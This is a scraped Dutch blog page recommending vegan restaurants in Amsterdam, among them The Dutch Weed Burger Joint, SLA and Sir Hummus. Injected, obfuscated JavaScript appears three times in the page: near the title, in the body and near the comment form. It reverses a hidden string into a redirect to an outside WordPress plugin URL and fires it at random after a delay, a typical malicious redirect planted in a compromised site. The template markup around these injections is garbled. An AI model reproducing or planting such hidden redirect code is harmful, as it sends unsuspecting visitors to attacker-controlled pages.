) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”]
[us_separator size=”small”]
Food
Geen reacties
<”h1″ class="w-post-elm post_title entry-title " style="font-weight:”700″;" itemprop="headline">De beste vegan restaurants in Amsterdam) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom_1551017314713{padding-top: 0px !important;}”]
Vegan food van restaurants in Amsterdam

Ben jij benieuwd op welke plekken in Amsterdam je heerlijk vegan kan dineren? Speciaal voor jou hebben wij de beste vegan restaurants in Amsterdam op een rijtje gezet. In onze top 10 vegan restaurants Amsterdam hebben we comfort food en gezondere restaurants voor jou uitgezocht. Keuze genoeg! Hieronder vind je de beste vegan restaurants in en rondom Amsterdam.

Burgers & vegan comfort food

Allereerst mag The Dutch Weed Burger Joint natuurlijk niet in deze lijst ontbreken. The Dutch Weed Burger zit vol zeewier, goede eiwitten en omega vetzuren en is ongelofelijk lekker!
De tweede aanrader is de Vegan Junk Food Bar, die je inmiddels op vier verschillende locaties in Amsterdam vindt. De naam zegt het al: vegan burgers, bitterballen, kapsalon en andere lekkere snacks.
Bij Meatless District in De Pijp of in Oud West ga je voor de MD Cheeseburger of de Kimchi Burger, maar ook een optie met meer groenten, zoals de barbacoa bowl met pulled jackfruit.
Pizza Heart Bar heeft pizza’s met vlees, maar ook veel lekkere vegan pizza’s. Daarom verdient dit restaurant ook een plekje in de top 10 vegan restaurants Amsterdam.
Mr. & Mrs. Watson is ook absoluut een aanrader. Voor de kaasliefhebbers onder ons: dit restaurant heeft een aantal bekroonde kazen op de menukaart staan!


Vegan salades & hummus

Natuurlijk zijn er ook vegan restaurants in Amsterdam met een groot aanbod: je vindt hier de meest gezonde, gevulde salades tot de beste hummus. Als organic salade bar mag SLA natuurlijk niet ontbreken op deze lijst. SLA is dé plek voor een gezonde, voedzame vegan maaltijd.
Of hou je meer van heerlijke fluffy hummus met diverse heerlijke toppings die je zelf mag kiezen? Dan is Sir Hummus echt iets voor jou! Al dit lekkers wordt geserveerd, zoals in Jeruzalem. Heerlijk eten en ook nog eens een unieke ervaring!

Hou je meer van een Oosterse twist? Neem dan een kijkje bij Benji’s. Hier geniet je van een raw rainbow noodle salad of van smakelijke vegan tempura. Om van te smullen.
Wil je uitgebreid dineren? Dan is Bonboon  de perfecte plek om heerlijk uitgebreid te genieten van een vegan driegangenmenu. Deze plek mag dus zeker niet ontbreken in de top vegan restaurants Amsterdam.
Tot slot hoort Loving Hut Amsterdam ook thuis in deze lijst. Hier hebben ze zelfs vegan sushi én sashimi!

Als Vegan is er voldoende keuze in Amsterdam als het gaat om top vegan restaurants. Heb jij al één van de bovenstaande restaurants bezocht? Deel met ons je ervaring en laat een reactie achter via de comments.

Meest recente blogs
[us_separator size=”custom” height=”0.8rem”]
Selected Grid Layout is not found. Check the element settings.
) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to”]

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

Fill out this field
Fill out this field
Geef een geldig e-mailadres op.
Je moet de voorwaarden accepteren voordat je het bericht kunt verzenden

[us_separator size=”large”]